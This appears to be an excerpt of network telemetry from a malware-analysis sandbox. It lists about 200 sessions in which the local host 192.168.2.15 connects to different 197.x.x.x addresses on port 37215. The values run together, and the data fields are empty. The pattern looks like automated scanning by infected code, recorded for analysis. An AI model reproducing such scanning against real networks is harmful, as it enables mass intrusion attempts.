                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29004192.168.2.1552780197.12.175.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29005192.168.2.1541902197.79.77.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29006192.168.2.1542632197.6.83.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29007192.168.2.1551306197.80.140.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29008192.168.2.1548772197.204.141.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29009192.168.2.1559598197.127.118.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29010192.168.2.1548328197.225.169.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29011192.168.2.1546606197.210.66.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29012192.168.2.1560900197.123.43.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29013192.168.2.1550074197.178.235.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29014192.168.2.1551524197.47.197.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29015192.168.2.1549222197.49.106.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29016192.168.2.1535972197.209.226.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29017192.168.2.1547326197.48.126.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29018192.168.2.1545926197.16.18.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29019192.168.2.1539596197.20.5.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29020192.168.2.1555924197.10.176.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29021192.168.2.1541112197.213.64.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29022192.168.2.1536974197.38.3.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29023192.168.2.1555658197.97.207.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29024192.168.2.1541642197.97.175.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29025192.168.2.1540440197.155.73.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29026192.168.2.1552410197.135.221.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29027192.168.2.1540682197.128.128.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29028192.168.2.1558044197.185.4.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29029192.168.2.1554906197.26.193.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29030192.168.2.1560206197.225.16.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29031192.168.2.1560970197.221.243.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29032192.168.2.1542272197.106.61.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29033192.168.2.1557746197.194.150.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29034192.168.2.1535062197.213.199.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29035192.168.2.1560314197.42.96.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29036192.168.2.1542808197.236.92.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29037192.168.2.1538272197.169.8.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29038192.168.2.1543832197.168.117.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29039192.168.2.1546926197.99.180.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29040192.168.2.1550470197.7.254.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29041192.168.2.1540504197.70.208.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29042192.168.2.1559668197.1.81.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29043192.168.2.1559140197.52.211.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29044192.168.2.1546214197.32.121.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29045192.168.2.1533652197.72.10.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29046192.168.2.1545114197.171.31.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29047192.168.2.1558208197.205.156.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29048192.168.2.1537506197.64.195.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29049192.168.2.1558970197.136.128.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29050192.168.2.1554770197.239.169.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29051192.168.2.1533342197.224.159.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29052192.168.2.1536860197.171.219.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29053192.168.2.1557496197.247.32.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29054192.168.2.1537450197.25.26.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29055192.168.2.1560570197.100.11.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29056192.168.2.1553056197.31.153.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29057192.168.2.1558314197.49.166.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29058192.168.2.1538804197.136.107.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29059192.168.2.1540998197.164.84.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29060192.168.2.1547728197.11.108.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29061192.168.2.1538902197.192.199.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29062192.168.2.1555594197.157.29.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29063192.168.2.1552624197.62.7.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29064192.168.2.1546350197.197.232.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29065192.168.2.1556398197.252.70.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29066192.168.2.1558394197.253.136.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29067192.168.2.1539714197.29.198.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29068192.168.2.1554824197.123.123.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29069192.168.2.1559152197.64.132.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29070192.168.2.1541982197.126.144.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29071192.168.2.1556204197.32.131.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29072192.168.2.1547766197.20.104.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29073192.168.2.1537706197.159.75.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29074192.168.2.1549734197.103.180.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29075192.168.2.1559670197.230.154.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29076192.168.2.1558344197.200.187.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29077192.168.2.1545618197.8.196.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29078192.168.2.1539838197.186.31.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29079192.168.2.1534518197.251.186.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29080192.168.2.1548512197.7.231.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29081192.168.2.1559534197.185.185.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29082192.168.2.1551798197.234.45.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29083192.168.2.1535038197.124.148.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29084192.168.2.1550806197.230.94.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29085192.168.2.1559994197.158.46.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29086192.168.2.1537042197.100.62.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29087192.168.2.1550792197.48.29.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29088192.168.2.1552672197.161.20.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29089192.168.2.1541974197.74.34.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29090192.168.2.1557336197.103.214.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29091192.168.2.1550466197.205.20.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29092192.168.2.1537394197.243.12.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29093192.168.2.1557504197.60.245.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29094192.168.2.1533842197.202.225.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29095192.168.2.1548478197.12.184.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29096192.168.2.1560656197.183.151.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29097192.168.2.1549202197.245.33.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29098192.168.2.1533900197.231.137.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29099192.168.2.1553980197.182.114.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29100192.168.2.1537240197.226.7.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29101192.168.2.1555016197.201.62.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29102192.168.2.1551094197.87.125.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29103192.168.2.1546598197.137.90.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29104192.168.2.1551734197.152.241.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29105192.168.2.1560474197.133.44.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29106192.168.2.1541404197.7.218.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29107192.168.2.1549062197.248.138.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29108192.168.2.1537536197.111.186.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29109192.168.2.1533678197.138.61.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29110192.168.2.1558062197.219.194.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29111192.168.2.1544842197.191.151.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29112192.168.2.1558456197.28.36.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29113192.168.2.1545754197.253.150.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29114192.168.2.1539438197.57.69.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29115192.168.2.1541116197.72.137.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29116192.168.2.1555794197.154.69.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29117192.168.2.1535404197.194.30.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29118192.168.2.1559908197.90.159.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29119192.168.2.1539768197.248.2.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29120192.168.2.1542536197.75.12.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29121192.168.2.1559886197.158.70.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29122192.168.2.1534450197.72.176.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29123192.168.2.1539728197.131.160.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29124192.168.2.1542924197.53.207.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29125192.168.2.1533470197.100.24.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29126192.168.2.1533916197.146.254.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29127192.168.2.1535416197.157.104.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29128192.168.2.1545856197.116.3.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29129192.168.2.1543090197.58.156.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29130192.168.2.1542390197.156.18.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29131192.168.2.1533632197.232.116.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29132192.168.2.1549226197.181.171.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29133192.168.2.1544698197.18.129.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29134192.168.2.1534200197.148.155.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29135192.168.2.1535204197.114.133.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29136192.168.2.1541644197.15.140.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29137192.168.2.1542484197.248.220.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29138192.168.2.1533324197.134.84.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29139192.168.2.1560784197.208.178.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29140192.168.2.1535072197.163.253.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29141192.168.2.1535404197.232.254.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29142192.168.2.1558612197.156.173.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29143192.168.2.1551564197.193.6.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29144192.168.2.1539826197.56.2.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29145192.168.2.1551252197.248.125.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29146192.168.2.1546048197.6.225.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29147192.168.2.1535156197.124.255.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29148192.168.2.1546160197.130.137.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29149192.168.2.1540930197.67.211.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29150192.168.2.1553896197.199.107.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29151192.168.2.1553482197.105.110.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29152192.168.2.1535646197.0.240.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29153192.168.2.1544226197.157.172.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29154192.168.2.1544240197.235.98.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29155192.168.2.1551922197.196.46.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29156192.168.2.1554968197.155.144.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29157192.168.2.1549382197.61.163.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29158192.168.2.1559734197.14.93.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29159192.168.2.1552304197.153.13.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29160192.168.2.1540210197.7.113.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29161192.168.2.1543226197.13.68.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29162192.168.2.1543688197.162.141.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29163192.168.2.1535658197.146.95.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29164192.168.2.1557778197.90.184.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29165192.168.2.1553510197.207.73.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29166192.168.2.1550672197.65.194.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29167192.168.2.1533498197.162.49.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29168192.168.2.1552942197.239.124.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29169192.168.2.1544656197.67.149.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29170192.168.2.1532882197.33.1.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29171192.168.2.1550388197.37.194.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29172192.168.2.1541910197.50.220.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29173192.168.2.1537080197.7.54.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29174192.168.2.1559640197.129.176.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29175192.168.2.1541780197.19.202.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29176192.168.2.1536750197.122.129.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29177192.168.2.1535148197.194.48.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29178192.168.2.1550234197.182.7.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29179192.168.2.1557136197.209.105.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29180192.168.2.1551204197.89.12.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29181192.168.2.1552378197.44.248.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29182192.168.2.1543560197.129.9.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29183192.168.2.1556866197.98.123.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29184192.168.2.1558370197.209.246.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29185192.168.2.1560596197.226.202.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29186192.168.2.1534628197.138.183.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29187192.168.2.1543402197.82.233.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29188192.168.2.1559438197.9.158.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29189192.168.2.1556842197.5.250.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29190192.168.2.1558030197.195.250.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29191192.168.2.1533334197.138.13.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29192192.168.2.1559102197.10.195.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29193192.168.2.1546710197.77.10.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29194192.168.2.1543144197.81.255.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29195192.168.2.1543214197.52.23.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29196192.168.2.1547224197.15.157.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29197192.168.2.1551994197.66.16.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29198192.168.2.1543066197.145.35.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29199192.168.2.1554266197.87.76.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29200192.168.2.1536788197.105.199.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29201192.168.2.1537516197.118.239.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29202192.168.2.1541356197.101.214.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29203192.168.2.1536434197.41.23.22537215
